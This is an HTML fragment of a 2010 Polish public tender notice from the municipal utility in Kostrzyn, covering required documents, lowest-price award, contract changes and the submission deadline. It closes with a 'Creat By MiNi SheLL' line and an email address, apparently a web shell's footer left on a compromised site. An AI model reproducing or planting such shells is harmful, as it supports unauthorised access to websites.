<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">oświadczenie Wykonawcy, że zapoznal się z treścią specyfikacji istotnych warunków zamówienia do postępowania i że oferowane przez niego roboty, odpowiadaja wymaganiom określonym przez Zamawiającego.Jeżeli Wykonawca polega na doświadczeniu i potencjale innego podmiotu, to ośwaidczenie musi złozyć również ten podmiot.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy w oparciu o art. 144 ust. 1 może dotyczyć:
- zmiany będącej następstwem działania organów administracji, w szczególności przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracyjne decyzji, zezwoleń itp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kostrzyn.wlkp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Komunalny
ul. Poznańska 2
62-025 Kostrzyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.06.2010 godzina 09:00, miejsce: Zakład Komunalny
ul. Poznanska 2
62-025 Kostrzn
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com